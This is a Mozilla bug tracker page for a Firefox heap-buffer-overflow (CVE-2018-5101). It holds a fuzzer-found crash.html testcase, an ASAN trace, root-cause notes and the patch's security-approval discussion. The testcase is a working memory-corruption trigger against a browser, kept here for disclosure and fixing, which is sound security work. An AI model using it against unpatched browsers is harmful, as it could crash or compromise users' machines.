Closed
Bug 1417661
(CVE-2018-5101)
Opened 7 years ago
Closed 7 years ago
heap-buffer-overflow in nsFirstLetterFrame::CreateContinuationForFloatingParent
Categories
(Core :: Layout: Floats, defect)
Tracking
()
VERIFIED
FIXED
mozilla59
People
(Reporter: nils, Assigned: emilio)
Details
(Keywords: reporter-external, sec-high, Whiteboard: [adv-main58+][post-critsmash-triage])
Attachments
(4 files)
|
952 bytes,
text/html
|
Details | |
|
21.37 KB,
text/plain
|
Details | |
|
936 bytes,
text/plain
|
Details | |
|
3.37 KB,
patch
|
bzbarsky
:
review+
gchang
:
approval-mozilla-beta+
abillings
:
sec-approval+
|
Details | Diff | Splinter Review |
The following testcase crashes the latest ASAN build of Firefox 59.0a1 (SourceStamp=f0c0fb9182d695081edf170d8e3bcb8164f2c96a)
crash.html:
<script>
function start() {
o1481=new DOMParser();
o1506=o1481.parseFromString(undefined,'image/svg+xml');
o1621=document.createElement('style');
o1622=document.createTextNode('.class1');
o1621.appendChild(o1622);
o1807=document.createElement('shadow');
document.replaceChild(o1506.documentElement,document.documentElement);
document.documentElement.appendChild(o1621);
o2064=document.createElementNS('http://www.w3.org/1999/xhtml','style');
o2065=document.createTextNode('{"a"""}:root{ direction: rtl}\n*{ display: unset}:first-letter{ -moz-border-start: inherit; float: inherit; border-inline-start-style: dashed}:first-line{}\n*{ -moz-border-start-style: initial; float: right; -moz-column-width: 51mm;0');
o2064.appendChild(o2065);
o1807.appendChild(o2064);
document.documentElement.appendChild(o1807);
document.documentElement['getBoxQuads'](undefined);
o1622.after('undefined');
}
</script>
<body onload="start()"></script>
ASAN output:
=================================================================
==20193==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6030002674d8 at pc 0x7efe79ae5218 bp 0x7ffedbd1b5d0 sp 0x7ffedbd1b5c8
READ of size 8 at 0x6030002674d8 thread T0 (file:// Content)
#0 0x7efe79ae5217 in Equals /builds/worker/workspace/build/src/layout/base/FrameProperties.h:399:16
#1 0x7efe79ae5217 in IndexOf<const mozilla::FramePropertyDescriptorUntyped *, mozilla::FrameProperties::PropertyComparator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:1190
#2 0x7efe79ae5217 in GetInternal /builds/worker/workspace/build/src/layout/base/FrameProperties.h:413
#3 0x7efe79ae5217 in Get<nsPlaceholderFrame> /builds/worker/workspace/build/src/layout/base/FrameProperties.h:235
#4 0x7efe79ae5217 in GetProperty<nsPlaceholderFrame> /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:3586
#5 0x7efe79ae5217 in GetPlaceholderFrame /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:911
#6 0x7efe79ae5217 in nsFirstLetterFrame::CreateContinuationForFloatingParent(nsPresContext*, nsIFrame*, nsIFrame**, bool) /builds/worker/workspace/build/src/layout/generic/nsFirstLetterFrame.cpp:319
#7 0x7efe798c06ed in CreateContinuation(nsIFrame*, nsIFrame**, bool) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:647:23
#8 0x7efe798bd928 in EnsureBidiContinuation /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:1865:10
#9 0x7efe798bd928 in nsBidiPresUtils::ResolveParagraph(BidiParagraphData*) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:924
#10 0x7efe798b7f16 in nsBidiPresUtils::Resolve(nsBlockFrame*) /builds/worker/workspace/build/src/layout/base/nsBidiPresUtils.cpp:765:10
#11 0x7efe79a659ac in ResolveBidi /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:7528:10
#12 0x7efe79a659ac in nsBlockFrame::GetMinISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:733
#13 0x7efe79ad1b1a in nsColumnSetFrame::GetMinISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:542:35
#14 0x7efe79ad9117 in ShrinkWidthToFit /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:6237:22
#15 0x7efe79ad9117 in nsContainerFrame::ComputeAutoSize(gfxContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:845
#16 0x7efe79ae03f1 in nsFrame::ComputeSize(gfxContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:5496:24
#17 0x7efe79a0836e in FloatMarginISize(mozilla::ReflowInput const&, int, nsIFrame*, mozilla::SizeComputationInput const&) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:13
#18 0x7efe79a0491e in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:759:30
#19 0x7efe79a09aba in mozilla::BlockReflowInput::PlaceBelowCurrentLineFloats(nsFloatCacheFreeList&, nsLineBox*) /builds/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:1078:19
#20 0x7efe79a90235 in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&, int&, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4704:12
#21 0x7efe79a8dfaa in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4099:12
#22 0x7efe79a855e6 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3845:9
#23 0x7efe79a7edd2 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
#24 0x7efe79a74a4f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2365:7
#25 0x7efe79a6bb3b in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1236:3
#26 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#27 0x7efe79ace8bd in nsColumnSetFrame::ReflowChildren(mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&, nsColumnSetFrame::ReflowConfig const&, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:810:7
#28 0x7efe79ad3e3e in ReflowColumns /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:507:19
#29 0x7efe79ad3e3e in nsColumnSetFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:1245
#30 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#31 0x7efe79ac80e4 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:757:5
#32 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#33 0x7efe79b947e8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
#34 0x7efe79b95e9e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
#35 0x7efe79b991a9 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1041:3
#36 0x7efe79a5277f in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:978:14
#37 0x7efe79a5104b in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:336:7
#38 0x7efe7984a3cc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8984:11
#39 0x7efe7985dc41 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9157:24
#40 0x7efe7985cec3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4230:11
#41 0x7efe797d0b52 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
#42 0x7efe797d0b52 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1921
#43 0x7efe797de75b in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:336:13
#44 0x7efe797de75b in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:306
#45 0x7efe797de456 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:328:5
#46 0x7efe797e09ab in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:769:5
#47 0x7efe797e09ab in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:682
#48 0x7efe797e05b6 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:583:9
#49 0x7efe7a034f42 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
#50 0x7efe73b98b21 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
#51 0x7efe73a63f65 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1815:28
#52 0x7efe736b91d9 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2119:25
#53 0x7efe736b61ef in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2049:17
#54 0x7efe736b7924 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1895:5
#55 0x7efe736b7f78 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1928:15
#56 0x7efe728f5e86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#57 0x7efe72910618 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#58 0x7efe736c0e41 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#59 0x7efe7362148b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#60 0x7efe7362148b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#61 0x7efe7362148b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#62 0x7efe790b6a0f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:159:27
#63 0x7efe7d3ede47 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#64 0x7efe7362148b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#65 0x7efe7362148b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#66 0x7efe7362148b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#67 0x7efe7d3ed7fa in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#68 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#69 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#70 0x7efe900a482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#71 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x6030002674d8 is located 0 bytes to the right of 24-byte region [0x6030002674c0,0x6030002674d8)
allocated by thread T0 (file:// Content) here:
#0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
#2 0x7efe726cd544 in Malloc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:211:46
#3 0x7efe726cd544 in nsTArrayInfallibleAllocator::ResultTypeProxy nsTArray_base<nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils>::EnsureCapacity<nsTArrayInfallibleAllocator>(unsigned long, unsigned long) /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray-inl.h:136
#4 0x7efe79ab003e in AppendElement<mozilla::FrameProperties::PropertyValue, nsTArrayInfallibleAllocator> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2217:47
#5 0x7efe79ab003e in AddInternal /builds/worker/workspace/build/src/layout/base/FrameProperties.h:451
#6 0x7efe79ab003e in Add<nsMargin> /builds/worker/workspace/build/src/layout/base/FrameProperties.h:190
#7 0x7efe79ab003e in AddProperty<nsMargin> /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:3609
#8 0x7efe79ab003e in nsFrame::DidSetStyleContext(nsStyleContext*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:1132
#9 0x7efe7989f95e in SetStyleContext /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:805:7
#10 0x7efe7989f95e in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1626
#11 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
#12 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
#13 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
#14 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
#15 0x7efe7989ff1c in mozilla::ServoRestyleManager::ReparentFrameDescendants(nsIFrame*, nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1676:9
#16 0x7efe7989fb02 in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1659:3
#17 0x7efe7989f45e in mozilla::ServoRestyleManager::DoReparentStyleContext(nsIFrame*, mozilla::ServoStyleSet&) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1538:7
#18 0x7efe7989c0a1 in mozilla::ServoRestyleManager::ReparentStyleContext(nsIFrame*) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1497:3
#19 0x7efe79c34397 in ReparentStyleContext /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:79:3
#20 0x7efe79c34397 in PullOneFrame /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:1058
#21 0x7efe79c34397 in nsFirstLineFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsInlineFrame.cpp:1118
#22 0x7efe79c2f8c9 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /builds/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:922:13
#23 0x7efe79a8ec74 in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4175:15
#24 0x7efe79a8d8b2 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3971:5
#25 0x7efe79a855e6 in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3845:9
#26 0x7efe79a7edd2 in nsBlockFrame::ReflowLine(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
#27 0x7efe79a74a4f in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2365:7
#28 0x7efe79a6bb3b in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1236:3
#29 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#30 0x7efe79ace8bd in nsColumnSetFrame::ReflowChildren(mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&, nsColumnSetFrame::ReflowConfig const&, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:810:7
#31 0x7efe79ad3e3e in ReflowColumns /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:507:19
#32 0x7efe79ad3e3e in nsColumnSetFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsColumnSetFrame.cpp:1245
#33 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#34 0x7efe79ac80e4 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:757:5
#35 0x7efe79ac985c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:934:14
#36 0x7efe79b947e8 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
#37 0x7efe79b95e9e in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
#38 0x7efe79b991a9 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1041:3
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/workspace/build/src/layout/base/FrameProperties.h:399:16 in Equals
Shadow bytes around the buggy address:
0x0c0680044e40: fd fa fa fa fd fd fd fd fa fa fd fd fd fa fa fa
0x0c0680044e50: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
0x0c0680044e60: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
0x0c0680044e70: fd fa fa fa fd fd fd fd fa fa 00 00 00 fa fa fa
0x0c0680044e80: fd fd fd fd fa fa fd fd fd fa fa fa fd fd fd fd
=>0x0c0680044e90: fa fa fd fd fd fa fa fa 00 00 00[fa]fa fa 00 00
0x0c0680044ea0: 00 00 fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
0x0c0680044eb0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c0680044ec0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c0680044ed0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c0680044ee0: 00 00 04 fa fa fa 00 00 00 00 fa fa fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==20193==ABORTING
|
||
Comment 2•7 years ago
|
||
Jet, do you know who could look at this? Thanks.
Group: core-security → layout-core-security
Flags: needinfo?(bugs)
|
||
Comment 3•7 years ago
|
||
Jonathan: can you take a first look? It's crashing in the bidi resolution code, but I haven't tried removing the root{ direction: rtl} from the test to see if it would still crash. Thx!
Flags: needinfo?(bugs) → needinfo?(jfkthame)
|
Assignee | |
Comment 4•7 years ago
|
||
This is floating first-letter stuff...
With a debug build:
[Child 29850, Main Thread] ###!!! ASSERTION: can only call this on floating first letter frames: 'IsFloating()', file /home/emilio/projects/moz/gecko-fennec/layout/generic/nsFirstLetterFrame.cpp, line 313
Assertion failure: HasAnyStateBits(NS_FRAME_OUT_OF_FLOW), at /home/emilio/projects/moz/gecko-fennec/layout/generic/nsIFrame.h:912
|
|
Assignee | |
Comment 5•7 years ago
|
||
|
|
Assignee | |
Comment 6•7 years ago
|
||
This is the first-line reparenting stuff, again. I figured out why this happens...
Here are some notes:
We create the letter frame with aBlockFrame = 0x7f90e39970b0 -> float: none
It's a :-moz-column-content!!!!
We reparent this frame when pulling out placeholders off the first-line.
$90 = (nsBlockFrame *) 0x7f90e39970b0 -> :-moz-column-content
(rr) p providerFrame
$126 = (nsColumnSetFrame *) 0x7f90e3997160 -> float: right
Then we reparent the first-letter under it, but:
p correctedFrame
$137 = (nsColumnSetFrame *) 0x7f90e3997160 -> float: right
Now the first-letter is inconsistent, because it thinks it's floating but it's not.
Assignee: nobody → emilio
Flags: needinfo?(jfkthame)
|
|
Assignee | |
Comment 7•7 years ago
|
||
Attachment #8929222 -
Flags: review?(bzbarsky)
|
||
Updated•7 years ago
|
status-firefox57:
--- → affected
status-firefox58:
--- → affected
status-firefox-esr52:
--- → unaffected
tracking-firefox57:
--- → ?
tracking-firefox58:
--- → ?
tracking-firefox59:
--- → ?
Version: 59 Branch → 57 Branch
|
||
Comment 8•7 years ago
|
||
Comment on attachment 8929222 [details] [diff] [review]
0001-Bug-1417661-Use-the-correct-parent-style-for-inherit.patch
r=me. Thank you!
Attachment #8929222 -
Flags: review?(bzbarsky) → review+
|
|
Assignee | |
Comment 9•7 years ago
|
||
Comment on attachment 8929222 [details] [diff] [review]
0001-Bug-1417661-Use-the-correct-parent-style-for-inherit.patch
[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Not much, it's clear what's wrong, but nothing is clear about how this could be exploited, or how could it even lead to something exploitable.
Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Again, not much, there's a reftest included, because this happens to be a correctness issue too. But it's hard to make it crash. I can also omit the reftest for now if it's preferred, but I'd rather don't.
Which older supported branches are affected by this flaw?
Release, beta, and nightly.
If not all supported branches, which bug introduced the flaw?
Stylo
Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
No, but they're trivial to create, I'm pretty sure the patch applies cleanly.
How likely is this patch to cause regressions; how much testing does it need?
Not much, it's a one-liner that makes the style we inherit from for ::-first-line correct.
Approval Request Comment
[Feature/Bug causing the regression]: Stylo
[User impact if declined]: Correctness in ::first-letter cases and issues like this bug.
[Is this code covered by automated tests?]: Yes
[Has the fix been verified in Nightly?]: No
[Needs manual test from QE? If yes, steps to reproduce]: No
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: not risky
[Why is the change risky/not risky?]: One liner that makes us consistent about the style the ::first-line inherits from.
[String changes made/needed]: none
Attachment #8929222 -
Flags: sec-approval?
Attachment #8929222 -
Flags: approval-mozilla-release?
Attachment #8929222 -
Flags: approval-mozilla-beta?
|
||
Comment 10•7 years ago
|
||
sec-approval+ for trunk checking on November 28 but ONLY THE FIX, NOT THE TEST. Tests can't be checked in until after the fix ships in a public release (such as 58). You'll need to put the test into a separate patch.
We'll want a beta patch nominated after this lands on trunk as well.
tracking-firefox57:
? → ---
Whiteboard: [checkin on 11/28]
|
|
||
Updated•7 years ago
|
Attachment #8929222 -
Flags: sec-approval? → sec-approval+
|
|
Assignee | |
Comment 11•7 years ago
|
||
(In reply to Al Billings [:abillings] from comment #10)
> sec-approval+ for trunk checking on November 28 but ONLY THE FIX, NOT THE
> TEST. Tests can't be checked in until after the fix ships in a public
> release (such as 58). You'll need to put the test into a separate patch.
Fair enough, though note that the test doesn't test the security issue, but an observable behavior which is not turnable into something that crashes.
Anyway moving the test to a new patch sounds fine.
> We'll want a beta patch nominated after this lands on trunk as well.
The patch should apply cleanly to beta.
|
|
Assignee | |
Comment 12•7 years ago
|
||
|
|
||
Updated•7 years ago
|
Whiteboard: [checkin on 11/28]
|
|
||
Comment 13•7 years ago
|
||
|
|
||
Updated•7 years ago
|
Target Milestone: --- → mozilla59
|
||
Updated•7 years ago
|
Group: layout-core-security → core-security-release
|
||
Comment 14•7 years ago
|
||
Comment on attachment 8929222 [details] [diff] [review]
0001-Bug-1417661-Use-the-correct-parent-style-for-inherit.patch
Fix a sec-high. Beta58+.
Attachment #8929222 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
|
|
||
Comment 15•7 years ago
|
||
| uplift | ||
|
|
Assignee | |
Comment 16•7 years ago
|
||
